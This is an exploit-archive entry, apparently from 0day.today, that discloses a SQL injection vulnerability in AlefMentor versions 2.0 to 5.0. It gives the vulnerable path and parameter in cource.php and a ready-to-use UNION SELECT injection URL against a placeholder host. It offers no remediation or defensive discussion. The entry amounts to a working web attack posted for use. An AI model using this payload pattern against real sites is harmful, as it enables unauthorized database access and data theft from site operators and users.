id: 10118
date: 12/08/2009
title: AlefMentor 2.0 <= 5.0 (id) Remote SQL Injection Vulnerability
author: Red-D3v1L
cves: 

=============================================================
AlefMentor 2.0 <= 5.0 (id) Remote SQL Injection Vulnerability
=============================================================

########################################################################
 
===[ Exploit SQL ]=== 
 
 [?] [Path]/cource.php?action=pregled&cont_id=[SQL]
 
 [?] Live dem0 :
 
http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--
 

 
###########################################################################



#  0day.today [2023-03-23]  #